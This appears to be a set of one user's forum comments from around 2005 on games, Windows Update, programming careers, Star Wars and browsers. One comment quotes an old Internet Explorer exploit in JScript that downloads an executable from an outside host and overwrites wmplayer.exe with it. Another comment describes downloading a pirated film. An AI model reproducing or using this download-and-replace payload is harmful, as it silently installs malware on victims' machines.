According to the June edition of PC Gamer, they were shown a demo/preview of Duke Nukem Forever. The article is short on details and there wasn't any pictures.
Here's a quote from the article:
Summing up Duke's lengthy stay in limbo. (George) Broussard says: "The short version is that after a lot of false starts, we regrouped and threw out everything in late 2002, and moved forward with our own rendering technology on top of Unreal. We've been moving forward and are making progress and are on-track since that decision was made. Most of the weapons and creatures are done. Most of the levels exist, and there's a ton of gameplay. We're in the process of pulling it all together, and very much look forward to showing it off. It won't be vaporware much longer."
Here's what PC Gamer said:
We were treated to a demo of various "interactions" between Duke and the environments, and of them ring true to the classic interactivity of Duke Nukem 3D. We can't spill the beans yet on the specifics, but needles to say, this is very much the Duke we all came to know and love in 1996.
The article was pretty much lip service, no real information other then it will be ready for 2006.
I just recently did my yearly Windows format. And WindowsUpdate was a pain in the ass, I think I had to reboot over 20 times.
I would download 20 critical updates, reboot, and then there would be 20 more critical updates, WTF? Why can't they just put them all there at once, so I only have to reboot once. Do this a few more times, and there are still a couple "new" updates after each reboot.
Now comes the "standalone" packages that require that they be installed seperately (i.e DirectX) and require Yet Another Reboot(tm) because It Just Works(tm).
The whole Windows Update system is horribly designed compared to the update programs of the various distros i've used.
Plus I need to have 3 services running in order to get manual or automatic updates
1) Automatic Update Service (Why do I need this enabled if I'm only doing manual updates?) 2) Background Intelligent Transfer Service 3) Cryptographic Services
I would go out and see it at a theatre if I wasn't chronically sick for the past several years. I am pretty much unable to leave the house, otherwise, I would love to go.
George Lucas is a true geek and has never had a girlfriend in his life. It is possible he has never spoken to a woman he wasn't related to in a social context.
Considering he was married for a while, had a kid and got divorced, I'd say hes gotten more sex then you or I, or most slashdotters for that matter.
I wanted to be a computer programmer for many years now, until recently. Both my parents graduated from U. of Waterloo and have been programming a long time now (my mom is a senior programmer for ScotiaBank, going on 30 years with them). They work her like a dog, she is at work more then she is at home. It's a stressful environment. On the plus side, she is paid well, making just over $100K Canadian a year (this year her income tax was $47,000, so she gets to keep half pretty much, good ol' Canada). As for me, I already suffer from alot of stress and anxiety, and I don't think it would be in my best interest to enter a field which would be even more detrimental to my health, even though I love programming.
All the shit thats been going on in the last 5 years with the programming industry has totally turned me off wanting to get a career as a programmer. I rather get into some other computer field that isn't as demanding and stressful. I had a nervous breakdown when I was about to start college for computer programming, and I haven't been able to go back since. This is why I don't want to be a programmer anymore, I'm already severely stressed, I don't need the added stress.
Until companies can provide a good working environment, I rather work in another field. I talked to guys that did the patio in my backyard and they were all computer graduates, working as renovators/builders/etc.. because the computer field is so dry. One of them was extremely intelligent, and he was reduced to laying bricks, it's a sad state and i'm perplexed as too which computer field I want to enter, if at all.
I'm interested in network security and system administration aside from programming, but I just don't know what I want to do anymore.
I just finished watching the workprint version. The audio and video quality is EXCELLENT. The audio is PERFECT, and the video looks DVD quality. One of the best downloaded releases I have ever seen (aside from the counters at the top).
It may or not be before special effects have been added
Special effects are included, it is the complete movie. There were a couple flaws with the release (the previously mentioned time counters for example).
I was worried at first when I loaded it into media player classic, because it said 34 minutes for the total time, but the movie played past the 34minute mark (there were some errors that cause the movie to jump back a couple seconds at the 34minute mark, before continuing on, it was kinda weird, happened at the 1hour and 2hour mark too).
I thought the movie would be bad, but it was actually EXTREMELY good. George Lucas managed to produce something really good! (unlike episode 1 and 2)
I downloaded it on wednesday off torrentspy, the quality is actually really good, it's not a cam release.
I refuse to pay to see it, I've already bought the original trilogy on VHS and DVD, and I paid to see phantom menace and clone wars (ugh!!). I've already given george enough of my money. Oh, and I own Indiana Jones trilogy on DVD.
I already own a PS2 with 32 games. I will most likely buy a PS3 when they come out. Even if Xbox has better hardware, I find the selection of quality games for playstation much better. I won't even consider buying an Xbox 360. Specs are nice, quality games are better.
PS. Whats with the all the white/apple/ipod copying going on lately? Both xbox360 and PS3 have the white cases.. And PowerPC chips? A little apple envy going on?
What's wrong with wired controllers anyway? The cords are a tad short, but buy some extensions and all was fine.
I find the cables of 2 controls get tangled bad enough as it is, imagine 7 controller cables! While I don't like the sound of 24 hour battery life, I much rather have wireless controllers in the long run.
Just check out the store for all the 50 cent crap priced at eye gouge prices.

Howto - Flying Snakes
·
· Score: 2, Interesting
I think it was on Discovery Channel I saw it, but they had snakes in a zero gravity plane (vomit comet). I believe they were trying to see if snakes would know which was was "up" during the free fall and level themselves off. Most snakes tumbled out of control, a few managed to "glide".
This paranoia is getting REALLY annoying. Folks- come to grips with the fact that freedom might, on occasion, require personal sacrifice. This country is getting really fucking annoying to live in, which is pretty much exactly what terrorists set out to do.
Exactly, I remember right after 9-11, Bush was like "We can't allow the terrorists to change our way of life or they will have won...", Well the terrorists won.
i'm going to develop a site where you can put in what equipment you have and it will generate instructions on how you can kill the most people with said equipment.
Step 1: Tie together a bunch of ipods..
Step 2: Wash in soapy water..
Step 3: Weapons of mass destruction!
Also, you can create a "dirty bomb" if you put some michael bolton or similar mp3s on the ipods first..
There's no such thing as 100% "safe", unless you disconnect your network cable and live in a bunker. I think the correct term for Firefox over Internet Explorer would be "safer".
And yes, I think firefox is safe compared to internet exploiter.
I switched originally to Mozilla 1.5 or 1.6 after reading this webpage
Here's the main chunk of offending exploit code (I'm pretty sure Microsoft finally fixed this after MANY months, since this is an old exploit)
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
What does it do? Well it downloads a.exe (a nasty trojan), and replaces windows media player with it (no warning or comfirmation dialog, just auto installs it!). Of course, this only works if your logged in with admin priviledges, and I bet 75% or more windows users are "admin".
I personally use Windows XP as admin for regular daily use, I know this isn't secure, but I have no choice. Running as admin is the only way 50% or more of my applications and games will run at all.
I've run as admin for 2 years now on this computer, and have never got a virus or trojan or worm or anything. I use firefox and this helps, with Internet Explorer, running as admin would be a death trap.
I've tried to create a limited use account on multiple occasions, set it up to look and feel exactly like my current admin account, and try to do anything productive. It's a pain in the ass to put it lightly. I end up deleting the limited use account after 1 hour and going back to admin only.

Hehe, its not your fault. Now I feel bad for making you feel bad =) I'm too sensitive I think...

Why is it that communist Cuba is boycotted by United States, yet United States deals with communist China? Seems a bit hypocritical to me.
ATARI (different then the original Atari), just closed 2 out of their 3 U.S offices. I wouldn't say they are doing well.
I downloaded it on wednesday off torrentspy, the quality is actually really good, it's not a cam release.

This would've been a great idea (for the MPAA) if they thought of this BEFORE everyone already owned a dvd player or two.
Just download the IEView extension for Firefox if you really must use that other browser..
No, but look forward to seeing the prequels of the prequels...

Episode I sucked ass, and I never bothered to see Episode II
Episode I was actually GOOD compared to Episode II, you didn't miss anything.
I like the sprinkler the best... check out the image

Anticlockwise
Is that like a person that hates all things that are clockwise? Or wait, maybe they meant counter clockwise?
Here here and here
